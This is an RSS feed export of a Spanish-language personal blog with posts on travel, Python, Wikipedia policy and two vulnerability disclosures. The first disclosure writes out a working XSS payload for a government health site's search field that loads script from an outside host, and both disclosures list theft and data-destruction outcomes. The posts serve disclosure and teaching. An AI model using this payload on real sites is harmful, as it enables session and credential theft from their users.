<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule">

<channel>
	<title>Mahadeva</title>
	<atom:link href="http://www.patriciomolina.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.patriciomolina.com</link>
	<description>Blog de Patricio Molina</description>
	<lastBuildDate>Fri, 19 Feb 2010 02:09:38 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/2.5/ar/</creativeCommons:license>		<item>
		<title>XSS en el sitio del Ministerio de Salud</title>
		<link>http://www.patriciomolina.com/2010/02/xss-en-el-sitio-del-ministerio-de-salud/</link>
		<comments>http://www.patriciomolina.com/2010/02/xss-en-el-sitio-del-ministerio-de-salud/#comments</comments>
		<pubDate>Thu, 18 Feb 2010 17:27:59 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Programación]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[ministerio de salud]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=323</guid>
		<description><![CDATA[Hace un par de días descubrí una vulnerabilidad XSS bastante común en el sitio web del Ministerio de Salud de la Nación.
Me sorprende que una vulnerabilidad tan evidente esté presente en uno de los sitios más importantes de nuestra administración pública. Como se podrán imaginar, los sitios gubernamentales son objetivos de alto riesgo en el campo [...]]]></description>
			<content:encoded><![CDATA[<p>Hace un par de días descubrí una vulnerabilidad <a href="http://es.wikipedia.org/wiki/Cross-site_scripting">XSS</a> bastante común en el sitio web del <a href="http://www.msal.gov.ar/">Ministerio de Salud de la Nación</a>.</p>
<p>Me sorprende que una vulnerabilidad tan evidente esté presente en uno de los sitios más importantes de nuestra administración pública. Como se podrán imaginar, los sitios gubernamentales son objetivos de alto riesgo en el campo de la seguridad informática, por lo que debería someterse a los más estrictos controles durante su desarrollo y su posterior mantenimiento.</p>
<p>Después de todo, &#8220;<em>cross-site scripting</em> (XSS) es una de las vulnerabilidades más predominantes, obstinadas y peligrosas en las aplicaciones web&#8221;<sup>1</sup>.</p>
<p><strong>¿En qué consiste la vulnerabilidad?</strong></p>
<p>Un usuario realiza una búsqueda en el sitio y la búsqueda original se le vuelve a presentar en un campo de texto junto a los resultados. Por ejemplo:</p>
<p><a href="http://www.patriciomolina.com/wp-content/uploads/2010/02/xss1.png"><img class="aligncenter size-full wp-image-366" title="xss1" src="http://www.patriciomolina.com/wp-content/uploads/2010/02/xss1.png" alt="Búsqueda en el Ministerio de Salud de la Nación" width="406" height="113" /></a></p>
<p>El código del campo de texto es el siguiente:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="html4strict" style="font-family:monospace;"><span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">input</span> <span style="color: #000066;">name</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;txtBusqueda2&quot;</span> <span style="color: #000066;">size</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;40&quot;</span> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;text&quot;</span> <span style="color: #000066;">value</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;hospitales del chaco&quot;</span> <span style="color: #66cc66;">/</span>&gt;</span></pre></td></tr></table></div>

<p>El problema se encuentra en la impresión de esa búsqueda original: los caracteres &lt; y &gt; (apertura y cierre de etiquetas HTML) <strong>no son convertidos a sus respectivas <a href="http://www.w3schools.com/tags/ref_entities.asp">entidades</a></strong>.</p>
<p>Parece un detalle menor, pero es un enorme agujero de seguridad que permite ejecutar código  arbitrario y comprometer seriamente la información de sus usuarios. Por ejemplo, si uno busca:</p>
<p style="text-align: center;"><tt>" /&gt;&lt;script type="text/javascript" src="<a href="http://fpaste.org/GVwV/raw/">http://fpaste.org/GVwV/raw/</a>"&gt;&lt;/script&gt;&lt;input type="hidden" value="</tt></p>
<p>Se obtiene:</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
</pre></td><td class="code"><pre class="html4strict" style="font-family:monospace;"><span style="color: #009900;">&lt;<span style="color: #000000; font-weight: bold;">input</span> <span style="color: #000066;">name</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;txtBusqueda2&quot;</span> <span style="color: #000066;">size</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;40&quot;</span> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;text&quot;</span> <span style="color: #000066;">value</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot; &quot;</span> <span style="color: #66cc66;">/</span>&gt;&lt;<span style="color: #000000; font-weight: bold;">script</span> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;text/javascript&quot;</span> <span style="color: #000066;">src</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;http://fpaste.org/GVwV/raw/&quot;</span>&gt;&lt;<span style="color: #66cc66;">/</span><span style="color: #000000; font-weight: bold;">script</span>&gt;&lt;<span style="color: #000000; font-weight: bold;">input</span> <span style="color: #000066;">type</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot;hidden&quot;</span> <span style="color: #000066;">value</span><span style="color: #66cc66;">=</span><span style="color: #ff0000;">&quot; &quot;</span> <span style="color: #66cc66;">/</span>&gt;</span></pre></td></tr></table></div>

<p>Y, por consiguiente (clic para agrandar):</p>
<p style="text-align: center;"><a href="http://www.patriciomolina.com/wp-content/uploads/2010/02/xss2.png"><img class="aligncenter size-full wp-image-368" title="xss2" src="http://www.patriciomolina.com/wp-content/uploads/2010/02/xss2.png" alt="XSS en el Ministerio de Salud de la Nación" width="500" height="302" /></a></p>
<p><strong>¿Qué consecuencias puede ocasionar esta vulnerabilidad?</strong></p>
<ul>
<li>Se puede esconder una URL maliciosa con un <a href="http://en.wikipedia.org/wiki/URL_shortening">acortador de URL</a> que redirija a la víctima hacia el sitio vulnerable junto con un <tt>POST</tt> de búsqueda que permita ejecutar código arbitrario.</li>
<li>Se podría obtener datos de sesión, credenciales de correo electrónico, acceso a paneles de administración, etcétera.</li>
<li>Si se añaden las librerías adecuadas (como jQuery), es posible enviar estos datos a nuestros servidores de forma transparente, sin que el usuario se percate del ataque, y almacenarlos para su uso posterior.</li>
</ul>
<p>La vulnerabilidad fue reportada oportunamente, pero no obtuve respuesta (como suele suceder en el 95% de los casos). Espero que lo solucionen antes de que sea demasiado tarde.</p>
<p><small>1 &#8211; Fragmento de &#8220;<em><a href="http://cwe.mitre.org/top25/#CWE-79">Failure to Preserve Web Page Structure (&#8216;Cross-site Scripting&#8217;)</a></em>&#8220;, publicado en <em><a href="http://cwe.mitre.org/top25/">2010 CWE/SANS Top 25 Most Dangerous Programming Errors</a></em>.</small></p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2010/02/xss-en-el-sitio-del-ministerio-de-salud/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>XSS y SQL Injection en Infobae.com</title>
		<link>http://www.patriciomolina.com/2010/02/xss-y-sql-injection-en-infobae-com/</link>
		<comments>http://www.patriciomolina.com/2010/02/xss-y-sql-injection-en-infobae-com/#comments</comments>
		<pubDate>Fri, 05 Feb 2010 19:51:46 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Programación]]></category>
		<category><![CDATA[fail]]></category>
		<category><![CDATA[infobae]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=307</guid>
		<description><![CDATA[Ayer me puse a revisar Infobae en búsqueda de agujeros XSS, y grata fue mi sorpresa cuando encontré una falla en el primer intento, lo cual me da a entender que Infobae es un &#8220;colador&#8221;.

Y eso no es todo. Profundizando un poco más, encontré algo más grave:

Las líneas de debugging son públicas
Están imprimiendo consultas de [...]]]></description>
			<content:encoded><![CDATA[<p>Ayer me puse a revisar <a href="http://www.infobae.com/interior/home.html">Infobae</a> en búsqueda de <a href="http://es.wikipedia.org/wiki/Cross-site_scripting">agujeros XSS</a>, y grata fue mi sorpresa cuando encontré una falla en el primer intento, lo cual me da a entender que Infobae es un &#8220;colador&#8221;.</p>
<p><a href="http://www.patriciomolina.com/wp-content/uploads/2010/02/infobae2.png"><img class="aligncenter size-full wp-image-308" title="infobae2" src="http://www.patriciomolina.com/wp-content/uploads/2010/02/infobae2.png" alt="" width="395" height="371" /></a></p>
<p>Y eso no es todo. Profundizando un poco más, encontré algo más grave:</p>
<ol>
<li>Las líneas de <em>debugging</em> son públicas</li>
<li>Están imprimiendo consultas de SQL en comentarios HTML</li>
<li><strong>No están escapando caracteres en las consultas SQL</strong></li>
</ol>
<p style="text-align: center;"><a href="http://www.patriciomolina.com/wp-content/uploads/2010/02/infobae1.png"><img class="aligncenter size-full wp-image-309" title="infobae1" src="http://www.patriciomolina.com/wp-content/uploads/2010/02/infobae1.png" alt="" width="450" height="306" /></a></p>
<p style="text-align: left;">Este último punto significa que cualquier persona puede realizar <a href="http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL">inyecciones SQL</a><sup>1</sup>, o sea:</p>
<ol>
<li>Obtener información sensible de los usuarios registrados en Infobae, como nombres de usuario, números de DNI, direcciones de correo electrónico, contraseñas (si no están encriptadas o si utilizan <a href="http://en.wikipedia.org/wiki/Md5#Collision_vulnerability">hashes md5 reversibles</a><sup>2</sup>), etc.</li>
<li>Modificar información del diario, como el título de la portada principal (un amigo me sugirió que ponga &#8220;Encontraron las manos de Perón&#8221;)</li>
<li>Vaciar (<tt>TRUNCATE</tt>) o eliminar (<tt>DROP</tt>) tablas y bases de datos completas.</li>
</ol>
<p style="text-align: left;">Quise contactarme con ellos, pero la <a href="http://www.infobae.com/herramientas/escribanos.php">página de contacto</a> del diario <strong>no anda</strong>, así que les envié un mail con una descripción del problema (nunca me contestaron). Para que sepan: pasaron 24 horas y <strong>los agujeros no fueron parcheados</strong>.</p>
<p style="text-align: left;"><a href="http://www.patriciomolina.com/wp-content/uploads/2010/02/security-fail.jpg"><img class="aligncenter size-full wp-image-310" title="security-fail" src="http://www.patriciomolina.com/wp-content/uploads/2010/02/security-fail.jpg" alt="" width="380" height="344" /></a></p>
<p><small>1 &#8211; Es posible que utilicen usuarios con <a href="http://dev.mysql.com/doc/refman/5.0/es/privilege-system.html">jerarquía de privilegios</a>, aunque lo dudo.</small><br />
<small>2 &#8211; &#8220;<em>Recently, a number of projects have created MD5 rainbow tables which are easily accessible online, and can be used to reverse many MD5 hashes into strings that collide with the original input, usually for the purposes of password cracking</em>&#8221; (Wikipedia)</small></p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2010/02/xss-y-sql-injection-en-infobae-com/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Machu Picchu</title>
		<link>http://www.patriciomolina.com/2010/01/machu-picchu/</link>
		<comments>http://www.patriciomolina.com/2010/01/machu-picchu/#comments</comments>
		<pubDate>Fri, 29 Jan 2010 05:48:08 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Fotos]]></category>
		<category><![CDATA[machu picchu]]></category>
		<category><![CDATA[perú]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=300</guid>
		<description><![CDATA[
Con Nacho y Gali en Machu Picchu, a fines de diciembre de 2009
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="Machu Picchu" src="http://farm5.static.flickr.com/4066/4313311208_95a4ddeede.jpg" alt="Machu Picchu" width="450" height="338" /><br />
Con <a href="http://whydontyoukill.me/">Nacho</a> y <a href="http://www.facebook.com/galio2k">Gali</a> en <a href="http://es.wikipedia.org/wiki/Machu_Picchu"><em>Machu Picchu</em></a>, a fines de diciembre de 2009</p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2010/01/machu-picchu/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Identificando posibles &#8220;drops&#8221; de usuarios de Twitter, con Python</title>
		<link>http://www.patriciomolina.com/2010/01/identificando-posibles-drops-de-usuarios-de-twitter-con-python/</link>
		<comments>http://www.patriciomolina.com/2010/01/identificando-posibles-drops-de-usuarios-de-twitter-con-python/#comments</comments>
		<pubDate>Thu, 21 Jan 2010 19:59:01 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Programación]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=294</guid>
		<description><![CDATA[Hace un par de días se supo que Twitter liberará aquellos nombres de usuario que no hayan registrado actividad durante 6 meses o más.
Les dejo una herramienta para obtener los días de inactividad de un usuario a través de su último status publicado. Esta clase puede ser utilizada, por ejemplo, para recorrer listados de palabras [...]]]></description>
			<content:encoded><![CDATA[<p>Hace un par de días <a href="http://thenextweb.com/socialmedia/2010/01/19/twitter-username-goldrush/">se supo</a> que <a href="http://twitter.com/">Twitter</a> liberará aquellos nombres de usuario que no hayan registrado actividad durante 6 meses o más.</p>
<p>Les dejo una herramienta para obtener los días de inactividad de un usuario a través de su último <em>status</em> publicado. Esta <a href="http://es.wikipedia.org/wiki/Clase_(inform%C3%A1tica)">clase</a> puede ser utilizada, por ejemplo, para recorrer <a href="http://wordlist.sourceforge.net/">listados de palabras</a> en búsqueda de nombres valiosos.</p>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
</pre></td><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> twitter
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">sys</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">urllib2</span>
<span style="color: #ff7700;font-weight:bold;">from</span> <span style="color: #dc143c;">datetime</span> <span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">datetime</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> UnknownUser<span style="color: black;">&#40;</span><span style="color: #008000;">Exception</span><span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">pass</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> UnknownStatus<span style="color: black;">&#40;</span><span style="color: #008000;">Exception</span><span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">pass</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> TwitterExpire<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">def</span> <span style="color: #0000cd;">__init__</span><span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
        <span style="color: #008000;">self</span>.__t = twitter.<span style="color: black;">Api</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
&nbsp;
    <span style="color: #ff7700;font-weight:bold;">def</span> verify<span style="color: black;">&#40;</span><span style="color: #008000;">self</span>, username<span style="color: black;">&#41;</span>:
        <span style="color: #ff7700;font-weight:bold;">try</span>:
            <span style="color: #dc143c;">user</span> = <span style="color: #008000;">self</span>.__t.<span style="color: black;">GetUser</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">user</span>=username<span style="color: black;">&#41;</span>
        <span style="color: #ff7700;font-weight:bold;">except</span> <span style="color: #dc143c;">urllib2</span>.<span style="color: black;">HTTPError</span>:
            <span style="color: #ff7700;font-weight:bold;">raise</span> UnknownUser
        <span style="color: #ff7700;font-weight:bold;">else</span>:
            status = <span style="color: #dc143c;">user</span>.<span style="color: black;">GetStatus</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
            <span style="color: #ff7700;font-weight:bold;">if</span> status:
                timestamp = status.<span style="color: black;">GetCreatedAtInSeconds</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
                d = <span style="color: #dc143c;">datetime</span>.<span style="color: black;">fromtimestamp</span><span style="color: black;">&#40;</span>timestamp<span style="color: black;">&#41;</span>
                td = <span style="color: #dc143c;">datetime</span>.<span style="color: black;">now</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span> - d
                <span style="color: #ff7700;font-weight:bold;">return</span> td
            <span style="color: #ff7700;font-weight:bold;">else</span>:
                <span style="color: #ff7700;font-weight:bold;">raise</span> UnknownStatus
&nbsp;
<span style="color: #ff7700;font-weight:bold;">def</span> main<span style="color: black;">&#40;</span>username<span style="color: black;">&#41;</span>:
    te = TwitterExpire<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
    <span style="color: #ff7700;font-weight:bold;">try</span>:
        result = te.<span style="color: black;">verify</span><span style="color: black;">&#40;</span>username<span style="color: black;">&#41;</span>
    <span style="color: #ff7700;font-weight:bold;">except</span> UnknownUser:
        <span style="color: #ff7700;font-weight:bold;">print</span> u<span style="color: #483d8b;">&quot;User '%s' doesn't exist&quot;</span> <span style="color: #66cc66;">%</span> username
    <span style="color: #ff7700;font-weight:bold;">except</span> UnknownStatus:
        <span style="color: #ff7700;font-weight:bold;">print</span> u<span style="color: #483d8b;">&quot;Couldn't find any status for '%s'&quot;</span> <span style="color: #66cc66;">%</span> username
    <span style="color: #ff7700;font-weight:bold;">else</span>:
        <span style="color: #ff7700;font-weight:bold;">print</span> result
&nbsp;
<span style="color: #ff7700;font-weight:bold;">if</span> __name__ == <span style="color: #483d8b;">'__main__'</span>:
    <span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #008000;">len</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#41;</span> <span style="color: #66cc66;">&amp;</span>gt<span style="color: #66cc66;">;</span>= <span style="color: #ff4500;">2</span>:
        main<span style="color: black;">&#40;</span>username=<span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#91;</span><span style="color: #ff4500;">1</span><span style="color: black;">&#93;</span><span style="color: black;">&#41;</span></pre></td></tr></table></div>

<p>Algunos resultados:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">mahadeva@blue:~$ python2.5 last_status.py patito
258 days, 11:16:49.425212
mahadeva@blue:~$ python2.5 last_status.py patricio
Couldn't find any status for 'patricio'
mahadeva@blue:~$ python2.5 last_status.py usuarioinexistente
User 'usuarioinexistente' doesn't exist
mahadeva@blue:~$ python2.5 last_status.py shitmydadsays
1 day, 22:35:44.434214</pre></div></div>

]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2010/01/identificando-posibles-drops-de-usuarios-de-twitter-con-python/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wikimedia Argentina en la Rosada</title>
		<link>http://www.patriciomolina.com/2009/12/wikimedia-argentina-en-la-rosada/</link>
		<comments>http://www.patriciomolina.com/2009/12/wikimedia-argentina-en-la-rosada/#comments</comments>
		<pubDate>Thu, 24 Dec 2009 02:45:39 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Wikipedia]]></category>
		<category><![CDATA[casa rosada]]></category>
		<category><![CDATA[wikimedia argentina]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=283</guid>
		<description><![CDATA[
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="Yo en la Rosada" src="http://farm3.static.flickr.com/2692/4210271080_0c10d05e11_b.jpg" alt="" width="415" height="553" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2009/12/wikimedia-argentina-en-la-rosada/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Python 2.5 en iPod Touch 2G</title>
		<link>http://www.patriciomolina.com/2009/12/python-2-5-en-ipod-touch-2g/</link>
		<comments>http://www.patriciomolina.com/2009/12/python-2-5-en-ipod-touch-2g/#comments</comments>
		<pubDate>Mon, 21 Dec 2009 04:37:46 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Programación]]></category>
		<category><![CDATA[ipod touch]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=273</guid>
		<description><![CDATA[
Calculando un timedelta con Python 2.5.1 en el iPod Touch ¡Muy groso!
]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="alignnone" title="Python en el iPod Touch" src="http://img710.imageshack.us/img710/5017/pythonipod.png" alt="" width="320" height="480" /></p>
<p style="text-align: center;">Calculando un <a href="http://www.patriciomolina.com/2009/09/python-practico-usando-timedelta-para-calcular-dias-restantes/">timedelta</a> con Python 2.5.1 en el iPod Touch ¡Muy groso!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2009/12/python-2-5-en-ipod-touch-2g/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FAQ sobre artículos de LUGs en Wikipedia en español</title>
		<link>http://www.patriciomolina.com/2009/12/faq-sobre-articulos-de-lugs-en-wikipedia-en-espanol/</link>
		<comments>http://www.patriciomolina.com/2009/12/faq-sobre-articulos-de-lugs-en-wikipedia-en-espanol/#comments</comments>
		<pubDate>Sun, 20 Dec 2009 08:00:33 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Wikipedia]]></category>
		<category><![CDATA[cultura libre]]></category>
		<category><![CDATA[lugs]]></category>
		<category><![CDATA[software libre]]></category>
		<category><![CDATA[wikimedia argentina]]></category>

		<guid isPermaLink="false">http://www.patriciomolina.com/?p=257</guid>
		<description><![CDATA[¿Por qué se eliminan artículos de LUGs en Wikipedia?
Los wikipedistas trabajamos en el proyecto a través del consenso y dentro del marco de las políticas, convenciones y prácticas establecidas por la comunidad. Los artículos de LUGs tienen dos problemas: a) no tienen relevancia aparente y b) en su mayoría son artículos de autopromoción.
Definitivamente, no se [...]]]></description>
			<content:encoded><![CDATA[<p><strong>¿Por qué se eliminan artículos de LUGs en Wikipedia?</strong></p>
<p>Los wikipedistas trabajamos en el proyecto a través del <a href="http://es.wikipedia.org/wiki/Wikipedia:Consenso">consenso</a> y dentro del marco de las <a href="http://es.wikipedia.org/wiki/Wikipedia:Pol%C3%ADticas">políticas, convenciones y prácticas establecidas</a> por la comunidad. Los artículos de LUGs tienen dos problemas: a) no tienen <a href="http://es.wikipedia.org/wiki/Wikipedia:Art%C3%ADculos_sin_relevancia_aparente">relevancia aparente</a> y b) en su mayoría son <a href="http://es.wikipedia.org/wiki/Wikipedia:P%C3%A1ginas_de_autopromoci%C3%B3n">artículos de autopromoción</a>.</p>
<blockquote><p>Definitivamente, no se considera relevante para una enciclopedia un artículo que trate sobre grupos de música, empresas, organizaciones o personajes que carezcan de conocimiento público.</p>
</blockquote>
<p style="text-align: right;"><a href="http://es.wikipedia.org/wiki/WP:RE#Casos_comunes_de_irrelevancia_enciclop.C3.A9dica">Casos comunes de irrelevancia enciclopédica</a>, en <a href="http://es.wikipedia.org/wiki/WP:RE">WP:RE</a></p>
<p>Es <a href="http://es.wikipedia.org/wiki/Argumentum_ad_populum">falaz</a> utilizar una encuesta para validar un argumento, sin embargo, sirve como herramienta para conocer tendencias y sacar conclusiones. Hace algunos años se realizó <a href="http://es.wikipedia.org/wiki/Wikipedia:Encuestas/2007/Sobre_relevancia/Resultados">una encuesta en Wikipedia en español</a> para determinar qué temas suelen carecer de relevancia enciclopédica, y se concluyó lo siguiente respecto a las instituciones o clubes sociales que no trasciendan mas allá de una ciudad:</p>
<blockquote><p>Una institución o club social no es relevante si solo es trascendente en una ciudad. Las excepciones pueden venir de ejemplos que se relacionen con temas muy trascendentales, o en ciudades muy grandes donde la importancia de la institución sea altamente considerable.</p>
</blockquote>
<p><strong>¿Por qué borran el artículo de un LUG y no el artículo del <a href="http://es.wikipedia.org/wiki/Teto_Medina">Teto Medina</a>?</strong></p>
<p>Este es un argumento muy utilizado en las consultas de borrado de Wikipedia.</p>
<blockquote><p>En este momento hay muchos artículos que probablemente no deberían existir en Wikipedia, y hay muchos otros que actualmente no existen que sí deberían estar. Al afirmar eso [...] no estás argumentando la relevancia enciclopédica del artículo. Y eso es lo que se está discutiendo.</p>
<p>De hecho, si ese artículo no es enciclopédicamente relevante no sólo no debes justificarte en otros para apoyar tu argumento, sino que puedes colaborar con Wikipedia, y aclarar su relevancia para comprobar si corresponde que sea borrado.</p>
</blockquote>
<p style="text-align: right;"><a href="http://es.wikipedia.org/wiki/WP:QUEHAYDE">WP:QUEHAYDE</a></p>
<p><strong>Hay artículos de LUGs en la Wikipedia en inglés</strong></p>
<blockquote><p>Este es otro ejemplo del argumento falaz denominado como generalización apresurada. En este momento hay muchos artículos que probablemente no deberían existir en ninguna Wikipedia, y hay muchos otros que actualmente no existen y que sí deberían estar. Es por ello que el hecho de que un artículo no haya sido borrado todavía o no exista aún en otra Wikipedia no significa que no deba borrarse o mantenerse.</p>
<p>Si por el contrario el artículo ha sido ya creado y se ha discutido su borrado en otra Wikipedia ha de tenerse en cuenta que el contenido de Wikipedia en español se rige por las políticas de Wikipedia en español y se organiza de lo general a lo concreto en base las circunstancias de Wikipedia en español. Incluso si dos artículos fueran completamente iguales, argumentar como motivo que dichos artículos han sido borrados o mantenidos en otra wikipedia es un argumento falaz, no sólo ya porque otras wikipedias se encuentran en una situación distinta y poseen políticas diferentes al respecto, sino porque pueden estar tan equivocadas como nosotros.</p>
</blockquote>
<p style="text-align: right;"><a href="http://es.wikipedia.org/wiki/WP:ESA">WP:ESA</a></p>
<p><strong>¿Por qué Wikimedia Argentina elimina artículos de LUGs?</strong></p>
<p>En algunas listas de correo leí que Wikimedia Argentina está detrás de una &#8220;caza de brujas&#8221; contra el software y la cultura libres:</p>
<blockquote><p>Con la ola de borrados de páginas relacionadas a la comunidad de Software Libre y otras actitudes despreciables de Wikimedia Argentina para con la comunidad, creo que hay que pensar un poco antes de seguir dando respaldo a esta organización.</p>
</blockquote>
<p style="text-align: right;"><a href="http://proposicion.org.ar/lurker/message/20091212.182511.e20eef9b.es.html">Alguien muy enojado en la lista de Python Argentina</a></p>
<p>Los wikipedistas son autónomos y actúan libremente como usuarios de Wikipedia, no como miembros de Wikimedia Argentina. Wikimedia Argentina no tiene ninguna responsabilidad en las acciones de los wikipedistas.</p>
<p><strong>Wikipedia tiene algo contra nosotros</strong></p>
<blockquote><p>Extraoficialmente se comenta que existe cierta animosidad en contra de los usuarios de Software Libre que participan en Wikipedia.</p>
</blockquote>
<p style="text-align: right;"><a href="http://cafelug.org.ar/pipermail/colabora/2009-December/006418.html">Alguien en la lista de CaFeLUG</a><sup>1</sup></p>
<p>Los wikipedistas más experimentados suelen buscar artículos de la misma temática cuando hallan artículos sin relevancia aparente, generalmente para interiorizarse en el tema  o para comparar fuentes y referencias.</p>
<p>Sucede que, al hacer esto, a veces encontramos más artículos sin relevancia aparente, y ahí es cuando pasan cosas raras, como cuando se borraron masivamente artículos de actores de doblaje:</p>
<blockquote><p>No sé bajo que verdad se esconda esta persona, ya que solo responde a un seudónimo y no da la cara con su verdadera identidad, ni los verdaderos motivos para hacer esto. Es una vergüenza que este tipo de personas odien la libertad de expresión, de información, y más penoso es para nosotros permitir que estos &#8220;redentores&#8221; de la humanidad sigan haciendo de las suyas&#8230; Estas personas son los que desprecian el trabajo de los demás y no aprecian el esfuerzo de unos y otros.</p>
</blockquote>
<p style="text-align: right;"><a href="http://globedia.com/wikipedia-espanol-actores-doblaje">Un actor de voz mexicano muy enojado</a></p>
<p>No es la primera vez que nos dicen estas cosas (y no creo que vaya a ser la última). Si creen que en Wikipedia odiamos la libertad de expresión y de información, les recomiendo leer <a href="http://es.wikipedia.org/wiki/WP:NOES">WP:NOES</a>, particularmente &#8220;<a href="http://es.wikipedia.org/wiki/WP:NOES#Lo_que_la_comunidad_de_Wikipedia_no_es">Lo que la comunidad de Wikipedia no es</a>&#8220;</p>
<p><small>1- Edité este post usando Mozilla Firefox en mi Ubuntu 9.10. Este blog corre gracias a Wordpress, en un servidor Apache, con una base de datos MySQL y en un sistema operativo GNU/Linux. ¿No es irónico que yo, usuario de Wikipedia en español desde hace 4 años, esté en contra del Software Libre y de sus usuarios?</small></p>
]]></content:encoded>
			<wfw:commentRss>http://www.patriciomolina.com/2009/12/faq-sobre-articulos-de-lugs-en-wikipedia-en-espanol/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Este pibe es un fenómeno</title>
		<link>http://www.patriciomolina.com/2009/12/este-pibe-es-un-fenomeno/</link>
		<comments>http://www.patriciomolina.com/2009/12/este-pibe-es-un-fenomeno/#comments</comments>
		<pubDate>Thu, 10 Dec 2009 03:15:28 +0000</pubDate>
		<dc:creator>Pato</dc:creator>
				<category><![CDATA[Videos]]></category>
		<category><![CDATA[academia]]></category>
		<category><![CDATA[racing]]></category>

